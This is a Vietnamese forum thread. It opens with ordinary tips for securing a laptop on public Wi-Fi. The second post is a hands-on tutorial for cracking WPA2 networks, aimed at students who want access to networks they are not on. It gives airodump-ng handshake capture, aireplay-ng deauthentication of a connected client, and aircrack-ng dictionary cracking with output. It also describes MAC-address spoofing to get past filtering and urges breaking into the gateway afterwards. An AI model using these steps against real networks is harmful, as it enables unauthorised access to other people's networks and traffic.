Page 1 of 1

Bảo vệ laptop khi kết nối wifi công cộng

Posted: Sat Dec 27, 2008 2:46 am
by Kira
Bảo vệ laptop khi kết nối wifi công cộng



Kết nối không dây Wifi thường không có chế độ bảo mật do đó khi sử dụng dịch vụ này máy tính của bạn dễ dàng trở thành “mục tiêu” của những kẻ phá hoại. Vì vậy, bạn cần thực hiện một vài thao tác để đảm bảo an toàn cho máy tính trước khi “vi vu” trên mạng... nhất là lúc ở nơi công cộng.

Kết nối không dây (Wi-Fi) đang dần phổ biến vì những tiện lợi của nó; bạn sẽ thấy sự hiện diện của chúng khắp nơi từ café Internet, trong trường học cho đến sân bay, khách sạn... Để đảm bảo an toàn, bạn nên thực hiện vài thao tác đơn giản dưới đây.

Tắt tài khoản Guest: Để máy tính an toàn hơn, bạn nên tắt tài khoản Guest tránh người dùng đăng nhập bằng tài khoản này. Trong Windows XP, chọn Start\ Settings\ Control Panel\ User Accounts\ Guest\ Turn off the guest account.

Sử dụng tường lửa: Tường lửa kiểm soát dữ liệu ra vào máy tính và cảnh báo những hành vi đáng ngờ; là công cụ bảo vệ máy tính chống lại sự xâm nhập máy tính bất hợp pháp khi kết nối với môi trường bên ngoài. Thực hiện như sau: chọn Start\ Control Panel\ Windows Firewall\ tab General, đánh dấu tùy chọn mục On (recommend).

Đặt mật khẩu khi chia sẻ tập tin, thư mục: Người dùng sẽ được yêu cầu đăng nhập khi muốn truy cập những tập tin, thư mục chia sẻ. Nếu sử dụng Vista, HĐH sẽ điều chỉnh các thiết lập bảo mật dựa trên loại kết nối mạng của bạn. Chẳng hạn khi xác định dùng mạng công cộng, Vista tự động tắt chế độ chia sẻ tập tin và máy in để bảo vệ dữ liệu.

Thiết lập kết nối: Trước khi truy cập, bạn cần kiểm tra trạng thái hoạt động của card mạng, kích hoạt nó nếu đang ở chế độ disable. Chọn Start\ Connect To\ Show all connections. Cửa sổ Network Connections sẽ liệt kê các dạng kết nối mạng của máy, nhấn phải chuột trên Wireless Network Connection và chọn Enable. Để tiện cho việc quản lý kết nối, nhấn phải chuột trên Wireless Network Connection, chọn Properties. Đánh dấu tùy chọn vào mục “Show icon in notification area when connected”, nhấn OK. Biểu tượng Wireless Network Connection sẽ xuất hiện ở khay hệ thống.

Lưu ý: Một số loại laptop cho phép tắt/mở card mạng trực tiếp bằng hoặc thông qua phím tắt, bạn nên kiểm tra hay đọc tài liệu hướng dẫn của laptop để có thông tin này.

Nếu không có nhu cầu kết nối mạng, bạn nên tắt card mạng để đảm bảo an toàn và tiết kiệm điện năng. Thực hiện các thao tác như trên và chọn Disable.

Nếu thường xuyên kết nối với mạng này, bạn nên lưu lại thông số cấu hình mạng (profile) để không phải thực hiện thao tác dò tìm cho các lần kết nối sau.

Trong thực tế, card mạng Wi-Fi thường chỉ tìm được trạm phát sóng có cùng chuẩn. Trường hợp sóng yếu, kết nối chập chờn hoặc không kết nối được... bạn có thể thử một trong những cách sau: Di chuyển máy tính gần trạm phát sóng hơn, chọn tên mạng có cột sóng cao nhất (nhìn trên mục Signal Strength). Tín hiệu sóng càng mạnh cho tốc độ càng cao và ổn định. Hướng điểm thu sóng (PC card) hay anten (anten USB nếu có) về phía trạm phát sóng. Đổi chuẩn card mạng Wi-Fi sao cho tương thích.

Posted: Fri Feb 27, 2009 5:15 am
by aotasoft
ngày nay ở việt nam wireless ngày càng dày đặc , nhưng muốn dùng thì cũng không dễ , nhất là quân sinh viên chúng ta ,bởi vì đa phần được bảo mật bằng wpa2 hay mac adress limit , bài này sẽ giúp bạn ******** wpa và cách tấn công mac adress , qua đó bạn biết mạng wifi của bạn bị tấn công như thế nào và có cách phòng chống luôn
công cụ dùng trong bài : back track 2 live cd . download :remote exploit forum + google
mac adress của máy tấn công :00:0F:B5 :88: AC:82
mac adress của máy trong mạng wifi :00:0F:B5:FD:FB:C2
mac adress của acssespoint : 0:14: 6C:7E :40: 80
tên của mạng wifi :teddy
Access point channel: 9
Wireless interface: ath0

bước 1 : chuyển wireless card qua chế độ monitor

ifconfig eth0 up
iwconfig eth0 mode monitor

iwconfig

lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5 :88: AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
bước 2 : run airodum-ng để collect authentical :

airodump-ng -c 9 --bssid 0:14: 6C:7E :40: 80 -w psk ath0

*
-c 9 is chanel của network
- -bssid 0:14: 6C:7E :40: 80 is the access point MAC address.
-w psk file sẽ lưu IVs
ath0 is the interface name.
khi thành công bạn được như sau :

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 0:14: 6C:7E :40: 80

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

0:14: 6C:7E :40: 80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

0:14: 6C:7E :40: 80 00:0F:B5:FD:FB:C2 35 0 116


WPA handshake: 0:14: 6C:7E :40: 80” ở trên cùng nghĩa là airodump đang collect IVs file.

bây giờ thì ngồi đợi nha ( có khi cả ngày ha ha ha )
nhưng cách này sẽ giúp bạn rút ngắn thời gian đợi rất nhiều :
run aireplay-ng để tạo ra nhiều thông tin mã hóa hơn :

aireplay-ng -0 1 -a 0:14: 6C:7E :40: 80 -c 00:0F:B5:FD:FB:C2 ath0
khi thành công :
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34 :30: 30]

sau đó là đợi , càng lâu càng tốt nha
cuối cùng run aircrack-ng để ******** :
aircrack-ng -w password.lst -b 0:14: 6C:7E :40: 80 psk.cap
psk.cap là file capture ở trên
password.lst : đường dẫn đến file chứa password trong ổ cứng ( có thể là password.txt)
khi thành công :
Aircrack-ng 0.8


[00:00:00] 2 keys tested (37.20 k/s)


KEY FOUND! [ 12345678 ]


Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

vậy là có thể ******** thành công wpa rồi
lưu ý nếu bước cuối cùng không ra key thì đừng xóa file psk đi nha , copy cất kỹ đi từ từ ******** nha

VỚI MẠNG WIFI BỊ KHÓA MAC THÌ :khi bạn kết nối sẽ không có hiện tượng gì nhưng không kết nối được
muốn vào mạng thì phải thay mac adress của mình cho giống một trong những máy trong mạng đó :
bạn có thể đến gần và coi địa chỉ mac của một máy trong mạng lan đó sau đó đổi mac của mình giống với máy đó thì sẽ vào được , sau khi vào được thì cố gắng xâm nhập vào gateway lấy thêm mac"

Posted: Fri Feb 27, 2009 8:25 am
by HSBD
Tớ chả hỉu gì cả, híc
Tại chưa dùng bao giờ, vì có laptop đâu mà dùng